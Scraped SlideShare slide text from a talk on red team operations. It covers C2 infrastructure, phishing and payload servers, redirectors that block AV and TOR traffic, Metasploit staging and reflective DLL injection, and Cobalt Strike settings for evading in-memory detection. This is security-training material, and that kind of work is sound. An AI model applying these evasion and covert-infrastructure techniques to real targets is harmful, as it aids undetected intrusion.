"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 

Recently uploaded (20)

DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 

Introduction to red team operations

  • 1. Introduction to Red Team Operations Sunny Neo (@sunn_y_k) sunny@live.com.sg
  • 2. #whoami •Perpetual Information Security Student •Penetration Tester @ Centurion Information Security •It was really hard to get here - On and Off Fever Last Night
  • 3. Disclaimer •All views are mine and not the company I work for or any organisation that I am affiliated with. •I take NULL credit for all the materials presented here •I am here just to share the good work from awesome people and have fun
  • 4. Shout Out Raphael Mudge (@armitagehacker) •Awesome resource on Red Team Operations •Advanced Threat Tactics (2015) https://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-cou rse-and-notes/ https://www.youtube.com/watch?v=4w7krkqxRck&list=PL9HO6M_MU 2nf8Fa5bVefBW-9bg5Rx94_c •https://blog.cobaltstrike.com/
  • 5. Shout Out - Jeff Dimmock (@bluscreenofjeff) •Awesome materials on Red Team Infrastructure •https://bluescreenofjeff.com/2017-12-05-designing-effective-covert- red-team-attack-infrastructure/ •https://speakerdeck.com/bluscreenofjeff/building-a-better-moat-des igning-an-effective-covert-red-team-attack-infrastructure •https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
  • 6. Shout Out •Anyone who shared their experience with me or answer my stupid questions over Twitter / Slack (BloodHoundGang) / Beer(s)
  • 7. Objective •Share my journey on learning about Red Team Operations •Bridge the gap between Penetration Testers and Red Teamers
  • 8. Penetration Testing •Scope Provided • Limited to No Reconnaissance Required •No Stealth required • Scan everything in Scope • Run tools out of the box (Did you rebuild the tool?) •Simple to No Infrastructure setup
  • 9. Red Team Operation • Test your security investment in a realistic way – objective based • Depend on the type of operations • Full Scope Testing (Physical, Social and Cyber) • Long-Term Operation • Threat Emulation (Emulating a real-world actor) Source: https://blog.cobaltstrike.com/2015/07/09/models-for-red-team-operations/ https://blog.cobaltstrike.com/2016/02/17/the-threat-emulation-problem/
  • 10. Red Team Operation •Generally • Limited Information Provided • Require Stealth • Require Appropriate Infrastructure Setup for the operation
  • 12. Mindset •Boxed-in by Scope •Emphasize on Coverage for Systems and Vulnerabilities in Scope •Does not look for the easiest path to objective
  • 13. Habits •Guided by Mindset •Scan everything in Scope due to emphasis on coverage •Does not apply adversary’s tradecraft but whatever that gets the job done
  • 14. Scale •No clearly defined scope - How to start? •Excessive Information - How do you manage information gathered along the way due to the vague scope?
  • 15. Principles for Red Team Operations (Mine) •Protect your Infrastructure •Log Everything! •Less is More •Don’t Get Caught
  • 16. Protect Your Infrastructure •Why the need for Infrastructure? •Why the need to protect your infrastructure?
  • 17. Protect Your Infrastructure •Why the need for Infrastructure? •Why the need to protect your infrastructure?
  • 18. Typical Penetration Test Infrastructure Source: https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastruct ure/
  • 19. Services Required for Red Team Operations •SMTP Server – Phishing •Web and Database Servers – Phishing and Storing Stolen Credentials •Payload/Staging Servers – Storing and Sending Payloads •Multiple Teamservers – C2
  • 20. Shell Management •Never do anything from just one shell and one team server •Always try to persist and expand more shell accesses •Red team infrastructure design is critical for covert operations • Short Haul Servers – Initial Access + Post Exploitation Activities • Long Haul Servers – Low and Slow Callbacks + Session Passing •https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing -red-team-operations/
  • 21. Redirector and Filtering Source: https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
  • 23. Apache Redirector - .htaccess Source: https://bluescreenofjeff.com/2016-04-12-combatting-incident-responders-with-apache-mod_rewrite/
  • 24. .htaccess Blacklisting •Jason Lang (@curi0usJack) •.htaccess to redirect • known AV companies IP address ranges • TOR Exit Nodes •https://gist.github.com/c uri0usJack/971385e8334e 189d93a6cb4671238b10
  • 25. Automate Your Infrastructure • Painful to rebuild everything for each engagement • Automate Infrastructure setup with CoalFire’s Red Baron TerraForm Examples • https://rastamouse.me/2017/08/automated-red-team-infrastructure-deploy ment-with-terraform---part-1/ • https://rastamouse.me/2017/08/automated-red-team-infrastructure-deploy ment-with-terraform---part-2/ • https://github.com/Coalfire-Research/Red-Baron
  • 28. Command and Control (C2) Security • Protect your customer’s systems and data • You don’t want your agents/beacons to be hijacked or confidential data leaked • Evaluate the C2 security based on • Encryption • Authentication • Anti Replay Attacks • https://medium.com/@malcomvetter/responsible-red-teams-1c6209fd43cc
  • 29. Staged Beacon Process Staged Payload Public Key TeamServer Victim Meta Data Session Key VictimTeamServer TeamServer Victim Initial Callback Encrypted with TeamServer Public Key
  • 30. Staged Beacon Process Tasks TeamServer Victim Task Output VictimTeamServer Encrypted with Session Key Encrypted with Session Key Source: Raphael Mudge - Advanced Threat Tactics (2 of 9): Infrastructure https://www.youtube.com/watch?v=3gBJOJb8Oi0&feature=youtu.be&t=49m55s
  • 31. Log Everything! • Important to have timestamped logs for • Timeline of Events • Clean up • Investigation if anything goes down • Empire and Cobalt Strike are fine… • cmd.exe? • PowerShell? • bash? • Metasploit? • RDP?
  • 32. Log Everything! Tool Command Command Prompt prompt $D$S$T$S$P$G PowerShell PowerShell Profile/GPO Start-Transcript -Path C:psloggingtranscript.txt -NoClobber –IncludeInvocationHeader OR Computer Configuration – Administrative Templates – Windows Components – Windows PowerShell -“Turn on PowerShell Transcription” Bash ~/.bashrc #Enable Timestamp for Command Line and Use Screen to log session PS1='D{%F %T} [u@h W] $ ‘ screen -L -Logfile engagementXX.log bash #Expand History Limits, Enable TimeStamp and Append commands to History for multiple terminal export HISTSIZE= export HISTFILESIZE= export HISTTIMEFORMAT="%d/%m/%y %T " export HISTCONTROL=ignoredups:erasedups shopt -s histappend export PROMPT_COMMAND="history -a; history -c; history -r; $PROMPT_COMMAND" Msfconsole ~/.msf4/msfconsole.rc set ConsoleLogging true set LogLevel 5 set SessionLogging true set TimestampOutput true set PromptTimeFormat %Y/%m/%d %H:%M:%S
  • 33. Less Is More: Information Management •Don’t just collect information mindlessly •Use as many scripts as possible to perform data mining •Have some processes/tools to categorise the information/logs collected so that it can be easily lookup •http://www.harmj0y.net/blog/redteaming/push-it-push-it-real-good/ •https://vincentyiu.co.uk/cobaltsplunk/
  • 35. Target • Knowing your target • Knowing what kind of controls they have • Controls • Email Filtering Gateway • Egress Filtering and Authenticated Proxy with Domain Categorization • IDS/IPS (This Gen, Next Gen, Future Gen) • Sandbox • Antivirus (This Gen, Next Gen, Future Gen) • Endpoint Detection & Response • Security Operation Center with Analyst looking at alerts
  • 36. Tactics, Techniques and Procedures (TTPs) •What is the mode of operation? • Smash and Grab • Diversion • Long-Term Operation
  • 37. Tactics, Techniques and Procedures (TTPs) •Tradecraft – Bad Guy’s Best Practices •Learn from the Bad Guys • Threat Intelligence Reports • https://github.com/kbandla/APTnotes • https://github.com/aptnotes/data • MITRE ATT&CK Framework • https://attack.mitre.org/wiki/Main_Page • https://github.com/redcanaryco/atomic-red-team
  • 38. Toolset •Are your tools suitable for the operation? •Are you able to make operation trade-offs based on your knowledge of your tools? • What is the workflow of the tool? • What artifacts are created?
  • 39. Metasploit & Meterpreter •Web Delivery Module with windows/meterpreter/reverse_tcp
  • 40. Web Delivery Module Process 1. Run the PowerShell One-Liner to download and execute PowerShell Stager 2. Stager fetches the (encoded) Stage (DLL) and pass control to the Stage 3. Stage performs (decoding) and Reflective DLL Injection to run the actual payload
  • 41. PowerShell Stager on Wire • Run the PowerShell One-liner to download and execute PowerShell Stager
  • 42. Stage on Wire •Stager fetches the (encoded) Stage (DLL) and pass control to the Stage
  • 43. EnableStageEncoding Option •Web Delivery Module with windows/meterpreter/reverse_tcp •EnableStageEncoding => true
  • 46. (Reflective) DLL Injection Overview Process B Process AAttach Write DLLPath or Write DLL ContentProcess B Process A DLL Process B Process A New Memory Section Allocate Memory Execute - LoadLibrary / Reflective LoaderProcess B Process A DLL Process A New Thread Source: http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html Step 2 Step 1 Step 3 Step 4 *For DLL Injection, DLL File has to be written to disk
  • 47. Staged Meterpreter Memory Artifact Payload: windows/meterpreter/reverse_http
  • 48. Staged Meterpreter Memory Artifact Decoded Stage
  • 49. Staged Meterpreter Memory Artifact Actual Payload (metsrv.dll) Running
  • 50. Metasploit Paranoid Mode •(Generally) Metasploit should not be used for Red Teaming because most of its payloads can be hijacked and many signatures have been created for them •Use Paranoid Mode if need to - Payload UUID Whitelisting and SSL Certificate Pinning to prevent hijacking •Use “reverse_winhttps” instead of “reverse_https” to enable SSL Certificate Pinning for Stager
  • 51. Cobalt Strike •Adversary Simulation Tool •Features • Team Operation • Client Side Exploitation • Asynchronous Post Exploitation • Covert Communication Flexibility
  • 52. Cobalt Strike - Default Staged Beacon
  • 53. Cobalt Strike - Default Stage Memory
  • 54. Cobalt Strike - Default Beacon Memory
  • 55. Cobalt Strike - Default String in Stage and Beacon
  • 56. Memory Detection Heuristic • Thread or Memory are not mapped to a file • Static Image Size • RWX Page Memory Permission • Known Strings and PE headers • William Burgess & Matt Watkins - Advanced Attack Detection https://www.youtube.com/watch?v=ihElrBBJQo8 • Raphael Mudge – In-memory Evasion (1 of 4) - Detections https://www.youtube.com/watch?v=lz2ARbZ_5tE
  • 57. Cobalt Strike – Malleable PE •https://www.cobaltstrike.com/help-malleable-c2#memory
  • 58. Cobalt Strike – Malleable PE • obfuscate: “true” – >=3.11 • Reflective Loader does not initialise any unnecessary PE headers in allocated memory section for Beacon • Mask DLL Import Tables • Obfuscate any known strings for Beacon • cleanup: “true” • Free the memory of the Stage • module_x86 / module_x64 • Module Stomping • LoadLibrary a DLL that is not loaded and copy Beacon DLL into its memory space
  • 59. Cobalt Strike – Malleable PE Demo
  • 60. Cobalt Strike – Malleable PE •Additional Modification Options • prepend – Prepend strings before the DLL headers • strrep – replace string found •Could be used for Threat Emulation • peclone known malware binaries • Configure based on known YARA rule strings for malwares
  • 61. Cobalt Strike – Best Practices •Things you could do to make your beacon harder to be detected • Use Malleable Profile and PE • Do Session Prepping • Use “spawnto” to change the default process for Post Exploitation Activities • Use In-memory .NET Assembly Execution for Post Exploitation activities • Avoid using Stager • Avoid using PowerShell • Avoid Remote Process Injection
  • 62. Cobalt Strike – Best Practices •Recommended to Read/Watch • https://blog.cobaltstrike.com/2018/04/23/fighting-the-toolset • https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that- eats-its-tail/ • https://blog.cobaltstrike.com/2017/10/25/modern-defenses-and-you/ • https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon- commands/
  • 63. Other approaches to Detect Beacon Source: https://twitter.com/jackcr/status/992390807268352001
  • 66. Other Reference • https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac • https://www.netscylla.com/whitepapers/Crestcon18_Common_Pitfalls_in_Redteaming.pdf • https://blog.cobaltstrike.com/2013/06/28/staged-payloads-what-pen-testers-should-know/ • https://www.slideshare.net/44Con/44con-meterpreter-internalsv2 • http://buffered.io/posts/staged-vs-stageless-handlers/ • https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/ • https://www.blackhat.com/docs/us-16/materials/us-16-Nipravsky-Certificate-Bypass-Hiding-And-Executing-Malware-From-A-Digitally-Signed-Exec utable-wp.pdf • https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process • https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory • https://ketansingh.net/make-executable-harder-to-recover-from-memory/ • https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Int0X80-Anti-Forensics-AF.pdf • https://www.veil-framework.com/least-privilege-removing-unnecessary-memory-permissions/ • Michael Hale Ligh, Andrew Case, Jamie Levy, Aaron Walters (2014) - The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux and Mac Memory